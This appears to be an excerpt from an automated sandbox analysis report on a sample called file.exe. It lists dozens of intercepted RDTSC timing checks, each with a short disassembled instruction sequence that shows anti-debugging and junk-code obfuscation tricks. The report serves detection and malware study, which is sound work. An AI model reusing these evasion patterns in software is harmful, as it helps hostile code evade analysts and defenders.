          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC6591 second address: DC6598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC6759 second address: DC67F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a jmp 00007F0820DCC6B0h 0x0000000f jmp 00007F0820DCC6ABh 0x00000014 popad 0x00000015 pop ebx 0x00000016 nop 0x00000017 mov edi, eax 0x00000019 mov dword ptr [ebp+122D19C5h], ecx 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push eax 0x00000024 call 00007F0820DCC6A8h 0x00000029 pop eax 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e add dword ptr [esp+04h], 00000015h 0x00000036 inc eax 0x00000037 push eax 0x00000038 ret 0x00000039 pop eax 0x0000003a ret 0x0000003b and edi, dword ptr [ebp+122D2B11h] 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push edi 0x00000046 call 00007F0820DCC6A8h 0x0000004b pop edi 0x0000004c mov dword ptr [esp+04h], edi 0x00000050 add dword ptr [esp+04h], 00000019h 0x00000058 inc edi 0x00000059 push edi 0x0000005a ret 0x0000005b pop edi 0x0000005c ret 0x0000005d mov edi, dword ptr [ebp+122D1ABEh] 0x00000063 push eax 0x00000064 pushad 0x00000065 jmp 00007F0820DCC6B5h 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC67F2 second address: DC67F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC67F6 second address: DC67FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8348 second address: DC834D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8E0B second address: DC8E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8E10 second address: DC8E16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8E16 second address: DC8E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA8EB second address: DCA8F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0821212AE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC960E second address: DC9615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC9615 second address: DC961B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAED4 second address: DCAED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAED8 second address: DCAEDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0998 second address: DD09F3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0820DCC6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push edx 0x0000000f mov edi, 140F2FD5h 0x00000014 pop ebx 0x00000015 mov bx, si 0x00000018 push 00000000h 0x0000001a xor di, 70D5h 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push edx 0x00000024 call 00007F0820DCC6A8h 0x00000029 pop edx 0x0000002a mov dword ptr [esp+04h], edx 0x0000002e add dword ptr [esp+04h], 0000001Ch 0x00000036 inc edx 0x00000037 push edx 0x00000038 ret 0x00000039 pop edx 0x0000003a ret 0x0000003b jnc 00007F0820DCC6A6h 0x00000041 xchg eax, esi 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F0820DCC6ADh 0x00000049 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD2B18 second address: DD2B22 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0821212AECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0B57 second address: DD0B76 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0820DCC6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0820DCC6B3h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD1BA1 second address: DD1BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD2B22 second address: DD2B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a jmp 00007F0820DCC6B4h 0x0000000f pop ecx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0B76 second address: DD0B86 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0821212AE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD1BAF second address: DD1BB9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0820DCC6ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0C6A second address: DD0C86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F0821212AF0h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD3945 second address: DD394F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F0820DCC6A6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6FAF second address: DD6FB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F0821212AE6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD4B05 second address: DD4B10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0820DCC6A6h 0x0000000a popad 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6FB9 second address: DD6FD7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0821212AE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0821212AEFh 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD801B second address: DD801F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD801F second address: DD8050 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0821212AF5h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8050 second address: DD8056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD9031 second address: DD9053 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0821212AECh 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007F0821212AE6h 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD9053 second address: DD9061 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDAF6E second address: DDAF73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD9256 second address: DD925C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC3BF second address: DDC3E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F0821212AE6h 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC3E1 second address: DDC3E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC3E5 second address: DDC3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC3EB second address: DDC409 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0820DCC6A8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D2A59h] 0x00000013 push 00000000h 0x00000015 stc 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC409 second address: DDC40E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD2BD second address: DDD2C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD2C3 second address: DDD30A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F0821212AE8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov edi, dword ptr [ebp+122D2A41h] 0x00000027 push 00000000h 0x00000029 pushad 0x0000002a mov dword ptr [ebp+122D1A39h], edi 0x00000030 popad 0x00000031 push 00000000h 0x00000033 movzx edi, bx 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push ecx 0x0000003b pop ecx 0x0000003c push ebx 0x0000003d pop ebx 0x0000003e popad 0x0000003f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE311 second address: DDE315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD50C second address: DDD526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0821212AF6h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDD526 second address: DDD52A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDF3CB second address: DDF431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F0821212AE8h 0x0000000b popad 0x0000000c push eax 0x0000000d jc 00007F0821212AFDh 0x00000013 jmp 00007F0821212AF7h 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F0821212AE8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 mov dword ptr [ebp+122D1C5Ah], ebx 0x0000003d xchg eax, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 jbe 00007F0821212AE8h 0x00000046 push ecx 0x00000047 pop ecx 0x00000048 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDF431 second address: DDF43B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0820DCC6ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDF43B second address: DDF448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D825F7 second address: D825FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D825FD second address: D82605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82605 second address: D82624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F0820DCC6B5h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82624 second address: D8262A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8262A second address: D82670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F0820DCC6C1h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F0820DCC6B9h 0x00000012 jne 00007F0820DCC6AEh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0820DCC6B0h 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82670 second address: D82674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE194D second address: DE1953 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE28C1 second address: DE28D5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0821212AE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE2A44 second address: DE2A49 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE39C6 second address: DE39CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE3AAD second address: DE3AB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE3AB1 second address: DE3AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jbe 00007F0821212AF0h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEBCB9 second address: DEBCC5 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0820DCC6A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEBCC5 second address: DEBCCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEE5B2 second address: DEE5B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEE5B6 second address: DEE5CD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0821212AE6h 0x00000008 jmp 00007F0821212AEDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3ADB second address: DF3AF8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0820DCC6ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jg 00007F0820DCC6A6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3AF8 second address: DF3AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3BE7 second address: DF3C16 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0820DCC6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0820DCC6B1h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 pop eax 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3C16 second address: DF3C1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3C1A second address: DF3C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3C20 second address: DF3C37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0821212AF3h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3C37 second address: DF3C58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3C58 second address: DF3C6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3C6F second address: DF3C76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8C23 second address: DF8C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0821212AE6h 0x0000000a pop eax 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8C2E second address: DF8C33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8C33 second address: DF8C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF78EF second address: DF78F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF803E second address: DF8042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8042 second address: DF8046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8046 second address: DF805F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0821212AF3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF845A second address: DF8460 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8460 second address: DF846A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF846A second address: DF846E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF846E second address: DF8472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF23D second address: DFF241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFE5C5 second address: DFE5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0821212AE6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFE5D3 second address: DFE5D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFDD16 second address: DFDD24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0821212AEAh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFDD24 second address: DFDD2B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFDD2B second address: DFDD37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFDD37 second address: DFDD3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E032A2 second address: E032AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E032AB second address: E032B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07A52 second address: E07A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07D13 second address: E07D2C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push esi 0x0000000d jmp 00007F0820DCC6AAh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07F90 second address: E07F96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07F96 second address: E07F9C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
